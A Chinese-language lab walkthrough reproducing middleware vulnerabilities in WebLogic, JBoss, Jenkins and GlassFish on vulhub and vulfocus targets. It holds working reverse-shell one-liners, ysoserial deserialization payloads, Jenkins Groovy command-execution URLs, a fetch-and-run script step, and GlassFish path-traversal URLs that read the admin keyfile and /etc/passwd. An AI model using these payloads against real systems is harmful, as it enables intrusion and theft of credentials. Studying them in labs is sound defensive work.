CVE-2017-12149漏洞复现

服务攻防-中间件安全&CVE复现&Weblogic&Jenkins&GlassFish漏洞复现

中间件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,Flask,jQuery等
1、中间件-Weblogic安全
2、中间件-JBoos安全
3、中间件-Jenkins安全
4、中间件-GlassFish安全

常见中间件的安全测试:
1、配置不当-解析&弱口令
2、安全机制-特定安全漏洞
3、安全机制-弱口令爆破攻击
4、安全应用-框架特定安全漏洞

中间件安全测试流程:
1、判断中间件信息-名称&版本&三方
2、判断中间件问题-配置不当&公开漏洞
3、判断中间件利用-弱口令&EXP&框架漏洞

应用服务安全测试流程:
1、判断服务开放情况-端口扫描&组合应用等
2、判断服务类型归属-数据库&文件传输&通讯等
3、判断服务利用方式-特定漏洞&未授权&弱口令等

中间件-Weblogic安全问题

详解:weblogic详解

介绍:
Java应用服务器软件
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
探针默认端口:7001,Weblogic是Oracle公司推出的J2EE应用服务器

安全问题:

CVE_2017_3506
CVE_2018_2893
CVE_2018_3245
CVE-2018-2628反序列化
CVE_2020_14882
CVE_2021_2394 反序列化
CVE-2023-21839反序列化
......

以上的漏洞基本都可以使用现成熟的工具进行直接攻击利用。

漏洞复现

以CVE_2017_3506为例(其他编号漏洞利用基本类似,直接上工具,点一点~):

CVE_2017_3506漏洞复现

靶场:vulfocus
开启环境:
 

CVE-2017-12149漏洞复现_第1张图片


访问:
 

CVE-2017-12149漏洞复现_第2张图片


直接将url信息放入到工具当中进行检测:
存在漏洞,可直接进行命令执行:

CVE-2017-12149漏洞复现_第3张图片

一键利用:

CVE-2017-12149漏洞复现_第4张图片


其他漏洞编号利用方式类似,直接放入到工具当中进行检测,存在就存在,可直接执行命令或其上传,注入等操作。

手工操作复现:weblogic反序列漏洞复现

中间件-JBoos安全问题

详解:Jboss详解

介绍:
J2EE的开放源代码的应用服务器
是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。

Jboss通常占用的端口是1098,1099,4444,4445,8080,8009,8083,8093这 几个,Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。

安全问题:

CVE-2017-12149
CVE-2017-7504
弱口令 未授权访问
......

漏洞复现

CVE-2017-12149漏洞复现

该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

靶场:vulhub
参考:JBoss 5.x/6.x 反序列化漏洞

CVE-2017-12149漏洞复现_第5张图片

开启环境:

CVE-2017-12149漏洞复现_第6张图片

访问:
 

CVE-2017-12149漏洞复现_第7张图片


漏洞利用:

payload:
//反弹shell命令:
sh -i >& /dev/tcp/192.168.100.1/8888 0>&1
//base64加密后:
bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}
//ysoserial工具利用:
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -c{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser
//curl命令进行请求访问,发送:
curl http://192.168.100.134:8080/invoker/readonly --data-binary @poc.ser
//接收端开启监听
nc -lvvp 8888

在ysoserial工具目录下生成了poc.ser文件:

image.png

发送curl请求:

CVE-2017-12149漏洞复现_第8张图片

监听端成功接收,反弹shell成功:

CVE-2017-12149漏洞复现_第9张图片

CVE-2017-7504漏洞复现

介绍:
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

靶场:vulhub
参考:JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

CVE-2017-12149漏洞复现_第10张图片

开启环境:

CVE-2017-12149漏洞复现_第11张图片

访问:
 

CVE-2017-12149漏洞复现_第12张图片


漏洞利用:

//此漏洞和CVE-2017-12149利用方式差不多,区别就是请求地址不同
payload:
//反弹shell命令:
sh -i >& /dev/tcp/192.168.100.1/8888 0>&1
//base64加密后:
bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}
//ysoserial工具利用:
java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -c{echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser
//进行curl请求:
curl http://192.168.100.134:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc.ser
//接收端开启监听:
nc -lvvp 8888

发送curl请求:

CVE-2017-12149漏洞复现_第13张图片

监听端成功接收,反弹shell成功:

CVE-2017-12149漏洞复现_第14张图片

中间件-Jenkins安全问题

详解:Jenkins详解
介绍:

开源软件项目
Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件项目可以进行持续集成。
探针默认端口:8080

安全问题:

CVE-2017-1000353

CVE-2018-1000861

......

漏洞复现

CVE-2017-1000353漏洞复现

靶场:vulfocus
或vulhub
参考:Jenkins-CI 远程代码执行漏洞
vulhub环境:

CVE-2017-12149漏洞复现_第15张图片

vulfocus环境:
 

CVE-2017-12149漏洞复现_第16张图片


开启靶场:

CVE-2017-12149漏洞复现_第17张图片

访问:

CVE-2017-12149漏洞复现_第18张图片

漏洞利用:
工具地址:CVE-2017-1000353
JDK版本需要为jdk-8u291,其他版本可能失效,无法复现成功
下载地址:JDK8

payload:
//执行命令,创建文件
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /123.txt"
//执行exp
python exploit.py http://192.168.100.134:8080/ jenkins_poc.ser

//然后回到我们的靶机中打开终端输入以下命令,查看验证是否利用成功
docker ps -a
docker exec -it 838723a23ad0 /bin/bash
ls /

CVE-2017-12149漏洞复现_第19张图片

反弹shell命令:

sh -i >& /dev/tcp/192.168.100.1/8888 0>&1
//base64加密后
bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}

//反弹shell操作:
//将刚刚执行创建文件的命令,换成该反弹shell命令即可(base64加密后的)
java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"
//执行exp
python exploit.py http://192.168.100.134:8080/ jenkins_poc.ser

//接收端开启监听
nc -lvvp 8888

CVE-2017-12149漏洞复现_第20张图片


注意JDK版本,否则可能无法复现。

CVE-2018-1000861漏洞复现

靶场:vulhub
参考:Jenkins远程命令执行漏洞

CVE-2017-12149漏洞复现_第21张图片

开启环境:

CVE-2017-12149漏洞复现_第22张图片

访问:

CVE-2017-12149漏洞复现_第23张图片

漏洞利用:
exp下载地址:CVE-2018-1000861EXP

//使用exp脚本可直接利用,python2下使用
payload:
python2 exp.py 

python2 exp.py http://192.168.100.134:8080/ "touch /tmp/123.txt"
python2 exp.py http://192.168.100.134:8080/ "touch /tmp/test.txt"

//进入靶场环境进行验证:
docker ps
docker exec -it 靶场id /bin/bash
ls /tmp/

使用说明:

CVE-2017-12149漏洞复现_第24张图片

使用方式:

CVE-2017-12149漏洞复现_第25张图片

验证是否成功:
成功创建文件

CVE-2017-12149漏洞复现_第26张图片

还可以进行手工测试:

手工检测:
poc:
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{public%20x(){%22touch%20/tmp/rumilc%22.execute()}}
payload:
创建文件:
//发送以下请求:
http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public%20class%20x%20{public%20x(){%22touch%20/tmp/rumilc%22.execute()}}

CVE-2017-12149漏洞复现_第27张图片

验证:
成功创建

CVE-2017-12149漏洞复现_第28张图片

反弹shell:

payload:
//反弹shell命令进行base64加密
python2 exp.py http://192.168.100.134:8080  "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA+JjE=}|{base64,-d}|{bash,-i}"
//接收端开启监听
nc -lvvp 8888

CVE-2017-12149漏洞复现_第29张图片

成功反弹shell:

CVE-2017-12149漏洞复现_第30张图片

ps:如果不能反弹,可在服务端创建文本文件,将反弹shell命令写进文本文件当中。然后python开启http服务,观察状态。

//开启http服务:
python -m http.server 8080

//python2执行exp脚本,将远程文件保存至目标主机
python2 exp.py 目标主机 "curl -o /tmp/cmd.sh  http://xxxx:8080/cmd.txt"

//python2执行exp脚本,使目标主机运行脚本文件反弹shel
python2 exp.py 目标主机 "bash /tmp/cmd.sh"

CVE-2017-12149漏洞复现_第31张图片

http服务端可观察状态:

CVE-2017-12149漏洞复现_第32张图片

进入靶场验证,存在该文件:

CVE-2017-12149漏洞复现_第33张图片

接下来使用python2脚本执行exp命令执行shell脚本即可。

还可以手工浏览器访问,依次执行:

payload:
//这里拿本地演示
//将文件保存到目标主机
//http://ip:port/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl -o /tmp/cmd.sh http://you-ip:8080/cmd.txt".execute()}}

http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"curl -o /tmp/cmd.sh http://127.0.0.1:8080/cmd.txt".execute()}}



//执行shell脚本
//http://ip:port/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"bash /tmp/cmd.sh".execute()}}

http://192.168.100.134:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"bash /tmp/cmd.sh".execute()}}

访问时,浏览器空白界面:

执行成功

CVE-2017-12149漏洞复现_第34张图片

中间件-Glassfish安全问题

介绍:
GlassFish详解

一款商业应用服务器
GlassFish 是一款强健的商业兼容应用服务器,达到产品级质量,可免费用于开发、部署和重新分发。开发者可以免费获得源代码,还可以对代码进行更改。

安全问题:

CVE-2017-1000028
......

漏洞复现

CVE-2017-1000028漏洞复现

漏洞原理:

java语言中会把%c0%ae解析为\uC0AE,最后转义为ASCCII字符的.(点)。利用%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/来向上跳转,达到目录穿越、任意文件读取的效果。

靶场:vulhub
参考:GlassFish 任意文件读取漏洞

CVE-2017-12149漏洞复现_第35张图片

开启环境:

CVE-2017-12149漏洞复现_第36张图片

进入环境,访问:
环境运行后,访问http://your-ip:8080和http://your-ip:4848即可查看web页面。其中,8080端口是网站内容,4848端口是GlassFish管理中心。

CVE-2017-12149漏洞复现_第37张图片

payload:
//读取密码:
https://192.168.100.134:4848/theme/META-INF/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afdomains/domain1/config/admin-keyfile

//linux下读取文件:
https://192.168.100.134:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

//window下读取文件:
http://you-ip:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/windows/win.ini

成功读取密码:

CVE-2017-12149漏洞复现_第38张图片

成功读取文件:

CVE-2017-12149漏洞复现_第39张图片

 本文作者:rumilc, 来自FreeBuf.COM

免费领取安全学习资料包!(私聊进群一起学习,共同进步)CVE-2017-12149漏洞复现_第40张图片

渗透工具

CVE-2017-12149漏洞复现_第41张图片

技术文档、书籍

CVE-2017-12149漏洞复现_第42张图片 CVE-2017-12149漏洞复现_第43张图片

CVE-2017-12149漏洞复现_第44张图片

面试题

帮助你在面试中脱颖而出

CVE-2017-12149漏洞复现_第45张图片

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

CVE-2017-12149漏洞复现_第46张图片 

CVE-2017-12149漏洞复现_第47张图片

应急响应笔记

CVE-2017-12149漏洞复现_第48张图片

学习路线

 

你可能感兴趣的:(漏洞复现,web安全,安全,网络,python)